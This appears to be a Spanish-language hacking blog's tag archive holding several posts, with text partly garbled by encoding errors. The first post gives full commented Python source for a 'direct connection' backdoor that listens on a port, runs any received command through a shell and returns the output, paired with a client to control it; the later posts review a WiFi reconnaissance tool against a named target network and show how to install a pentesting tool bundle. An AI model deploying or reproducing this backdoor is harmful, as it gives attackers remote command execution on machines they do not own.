Tag Archive Tools

BySin Rostro

Creando un backdoor en python

Vamos a crear un backdoor en python馃槇馃槇馃槇馃槇馃槇馃槇馃槇馃槇馃槇, para que nos ayude en nuestras pruebas de pentest, nos servira cuando no podamos hacer uso de otros metodos de backdoring.

 

Este backdoor es de Conexion Directa. Trate de dejarlo lo mas comentado posible Saludos Hackers.

import sys, os
import socket
import getopt
import threading
import subprocess

# Definimos algunas variables globales
listen             = False
command            = False
target             = ""
port               = 0

# Vamos a definir una funcion que nos provea 
# de ayuda
def usage():
    print "\n\tTroyano de Conexion Directa"
    print 
    print "Uso: backdoor.py -t target_host -p port"
    print "-l --listen                       escuchar en [host]:[port]"
    print "-s --shell                      inicializa una shell"
    print
    print
    print "Ejemplos: "
    print "python backdoor.py -t 192.168.1.1 -p 5555 -l -s"
    print "\tPara dejar en escucha una shell"
    print "python backdoor.py -t 192.168.1.1 -p 5555"
    print "\tPara conectarse a una shell"
    print "\nSimple Backdoor de Conexion Directa para los"
    print "Miembros de la Comunidad de Hacking Publico & Sistemas Informaticos"
    print "el Creador de este codigo o cualquier Miembro de Hacking Publico"
    print "NO se hacen responsables por el uso que le puedan dar a este codigo,"
    print "el cual esta hecho con fines Educativos."
    sys.exit(0)

# Funcion que se encargara de el cliente
# osea la computadora que se conecta al 
# backdoor 
def client_sender():
    # Creamos el socket
    cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    try:
        # Hacemos la conexion al servidor/backdoor
        cliente.connect((target, port))
        # Aqui solo te pregunto tu nickname
        nickname = raw_input("Cual es tu nickname ? ")
        # Lo concateno (Tu nick) con otra cadena
        nickname += "@hacker ~:#"
        # Envio un whoami (Para que sepamos que 
        # usuario somos en el equipo comprometido)
        cliente.send("whoami")
        # Recibimos el usuario
        usuario = cliente.recv(1024)
        # Y lo imprimimos
        print "Eres el usuario: \t%s" % usuario
        
        while True:
            # Esperamos por mas input           
            buff = raw_input("%s " % nickname)
            
            # Enviamos comando
            cliente.send(buff)
            # El data es la respuesta del comando 
            # que Enviamos
            data      = cliente.recv(1024)

            print data
            
            # Si el comando es "exit"
            # nos desconectamos del servidor/backdoor
            # si es limpiar pantalla 
            # la limpiamos 
            try:
                if "exit" in buff:
                    cliente.send("exit")
                    cliente.close()
                    print "Bye, Bye!!!"
                    break     
                if "cls" or "clear" in buff:
                    if os.name('nt'):
                        os.system("cls")
                    else:
                        os.system("clear")
            except:
                continue
                        
    except:
        # Si hubo un error se produce una Excepcion
        # y salimos del script
        print "[*] Excepcion! Saliendo!!!"
        cliente.close()
        
def server_loop():
    global target
    
    # Si no indicamos la opcion -t
    # el server toma esta direccion
    if not len(target):
        target = "0.0.0.0"
    
    # Creamos el socket para las conexiones 
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)
    
    # Creamos un hilo por cada cliente que se conecte
    try:
        while True:
            client_socket, addr = server.accept()
            
            client_thread = threading.Thread(target=client_handler,
                                             args=(client_socket,))
            print "[*] Nuevo cliente conectado %s" % socket.gethostname()
            client_thread.start()
            
    except KeyboardInterrupt:
        print "Se ha detenido el server"
        sys.exit(1)        
        
        
def run_command(command):

    command = command.rstrip()

    
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, 
                                         shell=True)
    except:
        output = "Fallo al ejecutar el comando.\r\n"
 
    return output

def client_handler(client_socket):
    global command
     
    if command:
        while True:
            

            cmd_buff = client_socket.recv(1024)

            if "exit" in cmd_buff:
                print "El cliente %s se DESCONECTO." % socket.gethostname()
                client_socket.close()
                break                    
            
            response = run_command(cmd_buff)
            
            client_socket.send(response)
            
def main():
    global listen
    global port
    global command
    global target
    
    # aqui verificamos que el usuario haya
    # dado opciones, si no, imprime el modo
    # de uso (funcion usage() )
    if not len(sys.argv[1:]):
        usage()
    
    # Si el usuario dio opciones las leemos 
    # para verificar que sean validas, despues 
    # ejecutar lo correspondiente
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hlt:p:s", ["help", "listen", "target",
                                                             "port", "shell"])
    except getopt.GetoptError as err:
        print str(err)
        usage()
    
    for o,a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o in ("-l", "--listen"):
            listen = True
        elif o in ("-s", "--shell"):
            command = True
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-p", "--port"):
            port = int(a)     
        else:
            assert False, "Opcion no valida"
            
    if not listen and len(target) and port > 0:
        client_sender()
    if listen:
        server_loop()

main()

 

BySin Rostro

Intro a Python 2

Bueno pues esta vez les traigo la segunda parte de la introducci贸n a python, hablamos acerca de Scapy y lo poderoso que puede llegar a ser si se aprende a usar de forma correcta y de como es posible remplazar con este muchas de las herramientas de red que existen y por ultimo les muestro lo que se puede llegar a realizar con un script de python }:)

Movi茅ndonos con Scapy

ByDrok3r

ACRYLIC WiFi | An谩lisis de redes WiFi [Information Gathering Tool]

Cuando realizamos un pentesting, debemos iniciar con la fase de recopilaci贸n de informaci贸n sobre nuestro objetivo, para eso debemos de contar un “arsenal” de herramientas, con las cuales poder recopilar informaci贸n.

Tener mas de una herramienta u opci贸n para realizar esta tarea. Por ejemplo en el post de聽Pentesting de redes WiFi | Fase de recolecci贸n de informaci贸n聽utilice dos herramientas para recopilar informaci贸n sobre nuestra red objetivo. NetSpot聽y WiGLE聽las cuales aparte de ayudarme a recopilar informaci贸n sobre la red objetivo, pude encontrar mas informaci贸n, pues hacer mas de un escaneo de nuestro objetivo, y con distintas herramientas es muy recomendable.

Ahora hablare de otra herramienta que a mi parecer es muy buena pero tiene un inconveniente para los usuarios que creen en que todo es gratuito, pues esta herramienta es paga, aunque tiene su versi贸n gratuita no es igual que la versi贸n paga, pero de podemos probar la versi贸n pro por unos d铆as.

ACRYLIC WiFi聽es una herramienta que nos permite administrar las redes hasta realizar tareas de seguridad.

Incluso nos permite realizar escaneos de cobertura de una red WiFi, identificar contrase帽as por defecto tanto WEP, WAP o WPS entre una gran cantidad mas de funciones.

Esta herramientas nos facilita tanto el trabajo, que incluso tiene su propio blog (ACRYLIC WiFi Blog) en donde podemos encontrar temas desde la administracion de una red, la cobertura que esta tiene y algo que nos puede interesar, que es la seguridad.

Entre tantas de las utilidades que tiene esta herramienta, nos enfocaremos en lo que necesitamos, recopilar informaci贸n de nuestra red objetivo para las prubas de intrusi贸n.

Apenas iniciamos esta herramienta inmediatamente realiza un escaneo de las redes que tenemos a nuestro alcance, incluyendo nuestra red objetivo.

En la parte superior tenemos un panel en donde se muestran las redes detectadas e informaci贸n de cada una de ellas en una tabla. Mientras que en la parte inferior tenemos otro panel gr谩fico en donde tenemos mas informaci贸n de la red WiFi, espec铆ficamente informaci贸n sobre la se帽al, desde la calidad hasta la conectividad.

Nosotros nos enfocaremos en nuestra red objetivo (c934a2) y la informaci贸n que esta herramienta nos ofrece, Recordando la informaci贸n que ya hab铆amos recopilado en la primera fase del pentesting, veremos si tenemos nueva informaci贸n.

  • SSID
    • c934a2
  • BSSID
    • 60:02:92:E6:IF:14
  • Canal
    • 1 – 2.4 GHz
  • RSSI.
    • -30dBm – 50dBm
  • Tipo de Red.
    • Hogare帽a –
  • Seguridad.
    • WPA2-PERSONAL
  • Vendedor – Fabricante
    • PEGATRON – CISCO
  • Encriptaci贸n
    • WPA-PSK-CCMP-TKIP
  • WiFi Protected Setup
    • ACTIVO
  • ISP – Proveedor de Servicios de Internet (por comprobar)
    • Megacable M茅xico
  • Router (por comprobar)
    • Cisco DCP3925

En el panel inferior en la secci贸n Detailed info tenemos mas informaci贸n de una red seleccionada.

Ahora tenemos mucha mas informaci贸n, que al inicio. Este es un ejemplo de como realizar mas de un escaneo con distintas herramientas nos puede ser de utilidad, ya que podemos encontrar algo que el primer escaneo nos arrojo.

Acrilyc tambi茅n nos permite visualizar los paquetes en hexadecimal y aplicar filtros.

Por otra parte, podemos exportar los resultados del escaneo de nuestra red objetivo, a archivos .txt, .html y .csv. La facilidad de poder exportar la informaci贸n de nuestra red objetivo,

Con este reporte podemos analizar con mas tranquilidad la informaci贸n de nuestra red objetivo. Por ejemplo dentro de nuestro informe nos indican que tenemos un problema de saturaci贸n de se帽ales WiFi en el canal 1, que es cierto, ya que si vemos las redes que est谩n activas mas de 1 utilizan este canal.

Lo recomendable es no quedarse con un solo scanner, sino ir buscando mas y mejores que se puedan adaptar a nuestras necesidades.

ByDrok3r

SkTool | Una alternativa a Katoolin

kTool es una herramienta escrita en Python por THC la cual nos permite instalar una gran cantidad de herramientas de pentesting, entre otras funciones que tiene, como por ejemplo:
  • Limpiar el sistema
  • Actualizar lista de paquetes
  • Hacer un upgrade

Para tener esta herramienta, vamos al link en GitHub
———>聽GitHub – SkToolsv0.2

 

Una vez, estando en la pagina, podemos hacer clonar o descargar el .zip

En mi caso, sera desde la terminal.
Una vez tengamos ubicado el lugar donde queremos que esta se clone ingresamos la siguiente linea de comando

sudo git clone https://github.com/SkriptedSEC/SkToolsv0.2.git

y damos enter…

Posteriormente ingresamos en la carpeta que ahora tenemos, la cual tiene como nombre SkToolsv0.2

 

 

Para iniciar el programa debemos recordar que esta hecho en Python, entonces para iniciarlo es con la siguiente linea:
python聽 sktool.py

 

Lo medas es muy simple, e intuitivo. Por ejemplo en el men煤 principal tenemos 5 opciones de las cuales la cuarta opci贸n es la que nos interesa.

Al ingresar a la opci贸n 4 nos aparece un nuevo menu, en el cual tenemos las siguientes opciones:

  1. Hacking tools
  2. Accesorios
  3. Servicios
  4. Entornos de Escritorio
  5. Remover entorno de escritorio
  6. A帽adir Repositorios (Muy importante, para que funcionen las tools)
  7. Remover Repositorios
  8. Salir

 

 

Simplemente, es cuesti贸n de ver que programas necesitamos y queremos instalar, por ejemplo yo instale google chrome

 

 

 

  1. Recolecci贸n de informaci贸n (56 tools)
  2. An谩lisis de vulnerabilidades (35 tools)
  3. Aplicaciones web (38 tools)
  4. Bases de datos (6 tools)
  5. Ataques a contrase帽as (33 tools)
  6. Ataques Wireless (30 tools)
  7. Ingeniera inversa (11 tools)
  8. Explotaci贸n (17 tools)
  9. Husmeando Envenenado聽 (32 tools)
  10. Manteniendo el acceso (16 tools)
  11. An谩lisis forense (22 tools)
  12. Herramientas de reporte (9 tools)
  13. Ingeniera social (6 tools)
  14. Programaci贸n (13 tools)
  15. Anonimato (7 toosl)
  16. Criptograf铆a (3 tools)
  17. An谩lisis de malware (5 tools)